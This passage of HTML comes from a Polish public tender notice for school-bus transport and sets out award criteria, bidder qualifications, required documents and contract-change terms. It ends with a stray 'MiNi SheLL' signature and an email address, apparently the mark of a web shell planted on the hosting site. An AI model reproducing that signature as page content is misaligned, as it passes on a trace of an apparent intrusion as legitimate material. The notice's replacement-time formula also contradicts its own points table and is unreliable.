wymagania określone w dokumentach wskazanych powyżej stanowią wymagania minimalne, a ich spełnienie jest obligatoryjne. Niespełnienie ww. wymagań minimalnych będzie skutkować odrzuceniem oferty jako niezgodnej z warunkami zamówienia na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-02 do 2025-06-24</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenie zamówień na podstawie art. 214 ust. 1 pkt 7 i 8 ustawy Pzp - zamówienia polegającego na powtórzeniu podobnych usług.<br/>Zakres zamówienia na podobne usługi/roboty budowlane:<br/>– dowóz dzieci do szkół. Zamówienie polegające na powtórzeniu podobnych usług może stanowić nie więcej niż 50 % zamówienia podstawowego .<br/>Zamawiający uwzględnił całkowitą wartość tego zamówienia przy obliczaniu wartości niniejszego zamówienia publicznego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty dla poszczególnych części Zamawiający będzie się kierował następującymi kryteriami i ich wagami:<br/>Cena – 60%<br/>Czas podstawienia autobusu zastępczego – 40%<br/>- obliczenie punktów ze względu na kryterium „cena” dla poszczególnych wykonawców nastąpi według algorytmu:<br/>C = Cmin / Cb * 60 pkt,<br/>gdzie: C – ilość punktów obliczona dla badanej oferty w kryterium „cena”<br/>Cmin – cena w złotych najtańszej oferty, spośród złożonych ofert nie podlegających odrzuceniu<br/>Cb – cena w złotych badanej oferty<br/>- obliczenie punktów ze względu na kryterium „czas podstawienia autobusu zastępczego ” dla poszczególnych wykonawców nastąpi według algorytmu:<br/>F = Fb / F max * 40 pkt,<br/>gdzie: F – ilość punktów obliczona dla badanej oferty w kryterium „czas podstawienia autobusu zastępczego ”<br/>Fmax – najdłuższy zaoferowany czas podstawienia autobusu zastępczego<br/>Fb – czas podstawienia autobusu zastępczego w ofercie badanej<br/>2. Maksymalna ilość punktów, jaką wykonawca może zdobyć w kryterium „czas podstawienia autobusu zastępczego ” wynosi 40 pkt.<br/>3. Czas podstawienia autobusu zastępczego musi zostać podany w ofercie w minutach.<br/>4. Całkowita liczba punktów, jaką otrzyma dana oferta obliczona zostanie na podstawie poniższego wzoru:<br/>Lp = C+F<br/>Gdzie Lp – liczba punktów<br/>C – punkty przyznane w kryterium Cena<br/>F – punkty przyznane w kryterium czas podstawienia autobusu zastępczego<br/>W ramach kryterium „czas podstawienia autobusu zastępczego” punkty będą przyznawane według niżej wymienionych zasad:<br/>- do 20 minut - 40 pkt<br/>- do 40 minut – 10 pkt<br/>- do 60 minut – 0 pkt<br/>czas liczony od momentu zgłoszenia potrzeby podstawienia autobusu zastępczego.<br/>Maksymalny czas podstawienia pojazdu zastępczego w sytuacjach awaryjnych to 60 minut.<br/>5. Uzyskana punktacja zaokrąglona zostanie do dwóch miejsc po przecinku.<br/>6. W przypadku, gdy złożona oferta, której wybór prowadziłby do powstania obowiązku podatkowego Zamawiającego zgodnie z przepisami o podatku od towarów i usług VAT w zakresie wewnątrzwspólnotowego nabycia towarów, Zamawiający w celu oceny takiej oferty doliczy do przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek wpłacić zgodnie<br/>z obowiązującymi przepisami.<br/>7. Dla porównywania ofert pod względem kryterium cenowego zamawiający przyjmuje cenę brutto. Zamawiający wybierze jako ofertę najkorzystniejszą ofertę, która uzyska najwyższą sumaryczną liczbę punktów za wszystkie kryteria. W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru oferty najkorzystniejszej ze względu na to, że dwie lub więcej ofert uzyskało tę sama ilość punktów Zamawiający dokona spośród tych ofert wyboru oferty z najniższą ceną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia autobusu zastępczego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, zamawiający określa warunki udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie precyzuje warunku w tym zakresie<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający uzna, że wykonawca spełnia warunek w zakresie: posiadania uprawnień do prowadzenia określonej działalności zawodowej, jeżeli: Zamawiający wymaga aby Wykonawca posiadał aktualną licencję zezwalającą na przewóz osób pojazdami samochodowymi, zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym ( Dz. U. z 2012 r. Nr 1265 ze zm.) Warunek ten zamawiający uzna za spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie precyzuje warunku w tym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>Zamawiający uzna, że wykonawca spełnia warunek w zakresie wykształcenia, kwalifikacji zawodowych, doświadczenia, potencjału technicznego wykonawcy lub osób skierowanych przez wykonawcę do realizacji zamówienia, umożliwiające realizację zamówienia na odpowiednim poziomie jakości jeżeli:<br/>Warunek w zakresie doświadczenia:<br/>• brak<br/>Warunek w zakresie potencjału technicznego:<br/>• Wykonawca wykaże, że dysponuje odpowiednimi środkami transportu, dwoma autobusami przystosowanymi do bezpiecznego przewozu dzieci i młodzieży, wyposażonymi w minimum 50 miejsc siedzących. Warunki przewozu uczniów powinny być zorganizowane zgodnie z Ustawą z dnia 6 września 2001r. o transporcie drogowym (Dz. U. z 2024 r. poz. 728 z późn. zm.). Każdy środek transportu musi posiadać aktualne badania techniczne , ubezpieczenie OC i NW.<br/>• wymagane jest wykazanie przez Wykonawcę , że dysponuje bazą lokalową. Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował lokalem spełniającym w/w wymagania na<br/>czas realizacji zamówienia. Wymagane jest podanie dokładnej lokalizacji bazy transportowej.<br/>Warunek dotyczący osób skierowanych do realizacji zamówienia:<br/>• Wykonawca wykaże, że dysponuje osobami posiadającymi odpowiednie kwalifikacje zawodowe skierowanymi do realizacji zamówienia tj.<br/>- osoba zarządzająca przewozami posiadająca przewidziane przepisami prawa kwalifikacje (minimum 1 osoba) <br/>- kierowcy posiadający odpowiednie kwalifikacje do kierowania autobusami, dodatkowo posiadający co najmniej roczne doświadczenie zawodowe w kierowaniu autobusami (minimum dwie osoby); <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wykluczy z postępowania wykonawców, wobec których zachodzą podstawy wykluczenia, o których mowa w art. 108 ust. 1 ustawy PZP oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę<br/>oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022 r., poz. 835. Weryfikacja spełnienia warunku przez Zamawiającego nastąpi wyłącznie na podstawie oświadczenia składanego w oparciu o art. 125 ustawy Pzp oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę (załącznik nr 2) oraz na podstawie oświadczenia, którego wzór stanowi zał. nr 8 do SWZ. <br/>Oświadczenie wykonawcy , w zakresie art. 108 ust. 1 pkt 5 ustawy o braku przynależności do tej samej grupy kapitałowej.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>1.	odpowiedniego zezwolenia, licencji, koncesji lub potwierdzenia wpisu do rejestru działalności regulowanej, jeżeli ich posiadanie jest niezbędne do świadczenia określonych usług w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Dokument potwierdzający, że wykonawca posiada aktualną licencję zezwalającą na przewóz osób pojazdami samochodowymi, zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym (Dz. U. z 2024 r. poz. 728 z późn. zm.).<br/>2.	wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami:<br/>• Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje odpowiednimi środkami transportu, tj. dwoma autobusami przystosowanymi do bezpiecznego przewozu dzieci i młodzieży wyposażonymi każdy w minimum 50 miejsc siedzących. Warunki przewozu uczniów powinny być zorganizowane zgodnie z Ustawą z dnia 6 września 2001r. o transporcie drogowym (Dz. U. z 2024 r. poz. 728 z późn. zm.). Każdy środek transportu musi posiadać aktualne badania techniczne, ubezpieczenie OC i NW. <br/>• Potwierdzenie dysponowania zapleczem technicznym w postaci bazy lokalowej na czas realizacji zamówienia. Warunek zostanie spełniony jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował zapleczem technicznym w postaci bazy lokalowej na czas realizacji zamówienia. Wymagane jest podanie dokładnej lokalizacji bazy transportowej. <br/>3.	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;<br/>4.	oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy o braku przynależności do tej samej grupy kapitałowej.<br/><br/>Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile wykonawca wskazał w oświadczeniu wstępnym dane umożliwiające dostęp do tych środków.<br/>Wykonawca składa podmiotowe środki dowodowe aktualne na dzień ich złożenia.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 4. Do oferty należy załączyć:<br/>1) Formularz ofertowy wraz z oświadczeniami o spełnianiu warunków udział w postępowaniu oraz braku podstaw do wykluczenia o treści zgodnej z Załącznikiem nr 2 do SWZ.<br/>2) Pełnomocnictwo (jeśli wymagane)<br/>3) Zobowiązanie podmiotu trzeciego (jeśli występuje)<br/>4) Oświadczenie na podstawie art. 117 ust. 4 PZP w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia w zakresie wymagań określonych w Rozdziale VIII (jeśli zamawiający stawia wymagania w Rozdziale VIII) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawca dołącza do oferty oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu<br/>warunków udziału w postępowaniu w zakresie wskazanym w rozdziale II podrozdziałach 7 i 8<br/>SWZ. Oświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w postępowaniu, na dzień składania ofert, tymczasowo<br/>zastępujący wymagane podmiotowe środki dowodowe, wskazane w rozdziale II podrozdziale 9<br/>pkt 2 SWZ.Oświadczenie składane jest pod rygorem nieważności w formie elektronicznej lub w<br/>postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem osobistym.Oświadczenie<br/>składają odrębnie:<br/>- wykonawca/każdy spośród wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy oraz<br/>spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu.<br/>• W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia wykonawcy<br/>zobowiązani są do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego<br/>będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych<br/>wykonawców należy załączyć do oferty.<br/>Pełnomocnictwo powinno być załączone do oferty i powinno zawierać w szczególności wskazanie:<br/>- postępowania o zamówienie publiczne, którego dotyczy,<br/>- wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,<br/>- ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>• Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, spośród których tylko jeden spełnia warunek dotyczący uprawnień, są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy.<br/>• Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. W takiej sytuacji wykonawcy są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w przypadku wystąpienia okoliczności wymienionych w art. 455 ustawy Pzp.<br/>2. Na podstawie art. 455 ust. 1 pkt 1 ustawy Pzp Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty Wykonawcy, w następującym zakresie:<br/>1) Zmiany wynagrodzenia Wykonawcy w przypadku zmiany stawki podatku od towarów i usług,<br/>2) zmiany zakresu lub sposobu wykonywania któregokolwiek świadczenia Wykonawcy objętego przedmiotem umowy w razie zmiany przepisów prawa powszechnie obowiązującego lub prawa miejscowego w zakresie niezbędnym do dostosowania umowy do warunków świadczenia usług wynikających ze zmienionych przepisów prawa;<br/>3) zmiany w zakresie Podwykonawcy, po spełnieniu warunków określonych w § 10 umowy w przypadku, gdy Wykonawca powierzy Podwykonawcy do wykonania część zamówienia, którą zgodnie z ofertą miał wykonać osobiście lub gdy Wykonawca wykona osobiście część zamówienia, którą zgodnie z ofertą miał powierzyć do wykonania Podwykonawcy lub gdy następuje zmiana Podwykonawcy, na którego zdolnościach polegał Wykonawca ubiegając się o zawarcie umowy.<br/>4) zmiany terminu wykonania przedmiotu umowy, w przypadku:<br/>a) wystąpienia okoliczności spowodowanych siłą wyższą, w tym wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć, w tym zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach np. pożar, zalanie, zamieszki, klęska żywiołowa, stan nadzwyczajny, stan zagrożenia epidemicznego, stan epidemii, o ile wyżej wymienione<br/>okoliczności mają charakter obiektywny,<br/>b) gdy wystąpi brak możliwości wykonywania usługi z powodu niedopuszczenia do ich wykonywania lub ich wstrzymania przez uprawniony organ, z przyczyn niezależnych od Wykonawcy,<br/>c) zmiany po upływie terminu składania ofert powszechnie obowiązujących przepisów prawa, które miały wpływ na możliwość wykonania umowy w terminie w niej ustalonym,<br/>d) konieczności zachowania ciągłości usługi do czasu wyłonienia kolejnego wykonawcy usługi będącej przedmiotem umowy;<br/>3. Zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu Stron wyrażoną w drodze aneksu do umowy pod rygorem nieważności.<br/>4. Zmianie podlegają także wszystkie nieistotne postanowienia w stosunku do treści oferty, a także inne nieistotne zmiany, które nie stanowią zmiany umowy i nie jest wymagane zawarcie aneksu do umowy, a jedynie niezwłoczne pisemne zawiadomienie drugiej Strony, w tym między innymi:<br/>1) zmiana danych teleadresowych Stron;<br/>2) zmiana danych związanych z obsługą administracyjno-organizacyjną umowy;<br/>3) zmiana Podwykonawcy określonego w ofercie Wykonawcy, po spełnieniu warunków określonych w § 10 umowy;<br/>4) zmianą osób skierowanych przez Wykonawcę do realizacji przedmiotu umowy.<br/>5) zmiana rozkłady jazdy autobusów.<br/>5. W sytuacji gdy łączna liczba zakupionych biletów na dany miesiąc będzie wynosiła 50% lub mniej w stosunku do szacunkowej łącznej liczby dowożonych uczniów, o której mowa w § 6 umowy, Wykonawcy przysługuje prawo do dostosowania ilości autobusów i osób skierowanych do realizacji zamówienia do liczby przewożonych osób przy zachowaniu postanowień umowy wynikających z § 6 z zastrzeżeniem ust. 6 i 7;<br/>6. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę, nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.<br/>7. Zamawiający może nie wyrazić zgody na dokonanie zmian postanowień Umowy, jeśli proponowana zmiana może wpłynąć na opóźnienie, obniżenie jakości wykonywanych prac lub zwiększenie kosztów wykonania Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-08-08 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi SWZ dokumentami należy złożyć za pośrednictwem elektronicznej platformy zakupowej pod adresem: https://strachowka.ezamawiajacy.pl w zakładce OFERTY</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-08-08 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-09-06</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com